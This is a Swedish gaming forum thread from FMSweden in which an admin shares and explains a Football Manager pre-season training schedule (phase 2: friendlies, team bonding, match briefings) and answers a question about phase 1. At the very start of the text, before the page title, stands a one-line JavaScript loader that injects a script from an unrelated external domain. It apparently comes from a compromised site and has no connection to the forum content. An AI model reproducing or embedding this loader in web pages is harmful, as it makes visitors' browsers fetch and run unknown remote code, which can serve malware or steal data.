;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dannes Lördagsgodis – Försäsong Fas 2 – Guider & annat – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

Dannes Lördagsgodis - Försäsong Fas 2

4 Inlägg
2 Users
12 Reactions
1,099 Visningar
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Nu ska jag inte svära på att jag är en riktig jäkel på att skapa träningsupplägg men någonstans så känner jag ändå att jag har lyckats med det här schemat. Att skapa egna träningsscheman är en viktig del av spelarutveckling av den enkla anledningen att dina spelare får ut så mycket mer av det än om din assisterande skulle haft hand om det. Tyvärr är det delvis svårt att avgöra exakt vad som kan vara bra att ta med i ett schema men även att faktiskt ständigt hålla den uppdaterad - för visst är det väl inte så jättesmart att ha ett försäsongsschema mitt i brinnande säsong?

Det här schemat riktar sig mot del två av en försäsong, det vill säga när träningsmatcherna väl har dragit igång och flåset hos spelarna sakta börjat byggas upp igen efter en skön semester, Gonzalo Higuaín-style. Spelarna har alltså fått sig en rejäl genomkörare under ca ett par veckors tid med alla möjliga fysiska tester och nu vill vi implementera nästa fas där spelarna ska lära känna varandra och inte minst taktiken. Det är en väldigt generell period där vi inte går på djupet någonstans utan jag vill vara så precis som möjligt vilket innebär att utveckla spelaren inte ligger i fokus här.

Som ni kan se är det inget schema som spelarna lägger sig i diket och spyr så slutkörda de är utan fokus ligger som sagt på en uppstart inför kommande säsong. Jag har dessutom planerat in två stycken träningsmatcher, en på onsdag samt en på lördag, där jag rekommenderar en upptrappning av nivån på motståndet men där vi ändå vinner alla matcher. Att vinna en träningsmatch med 10-0 mot ett korplag är kanske inte det roligaste och givande men det är just där du ska och måste börja eftersom detta kommer att ge effekt på spelarnas moral.

Samhällsarbete och Lagsammanhållning är två tillfällen där spelarna lär känna varandra och får en närmre relation där i synnerhet det sistnämnda är att rekommendera om du skulle vilja tweaka schemat. Genomgång inför match och Matchgenomgång ser jag som a och o även under brinnande säsong eftersom detta gör att man tillsammans med analytiker och spelare kan lära känna taktiken ännu bättre. Utöver et har vi ett par fyspass, ett par återhämtningspass och såklart en måndag som skriker fotbollsträning inkluderad alla lagdelar.

Nackdelen med det här schemat är brist på fyspass men jag tycker att två matcher i veckan väger upp det, sen beror det såklart på hur fysisk din taktik är; du kanske behöver tweaka schemat en del för att det ska passa just din filosofi. Jag ser det inte som en nackdel att spelarna ännu inte hunnit påbörja sina individuella träningstillfällen eller att fasta situationer inte finns med utan för mig kommer det i fas tre av en försäsong.

Schemat finns att abonnera på Steam! (klickbar)

Ser ni några möjligheter för förbättring av schemat eller om ni bara är sugna på att diskutera så skriv gärna här i tråden!


   
Putte, Micke and Phansell reacted
Citera
Phansell
(@phansell)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

Finns fas 1 någonstans att få tag på också? 

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli


   
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  
Postad av: @phansell

Finns fas 1 någonstans att få tag på också? 

Jag hade men hela min dator har kämpat emot mig en längre tid nu så har nada..

Men kort och gott är det mer fokus på Fysik 🙂


   
Phansell reacted
SvaraCitera
Phansell
(@phansell)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

@daniel-nilsson Segt när dem gör det. Dem jäklarna! 😉 

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli


   
SvaraCitera
Share: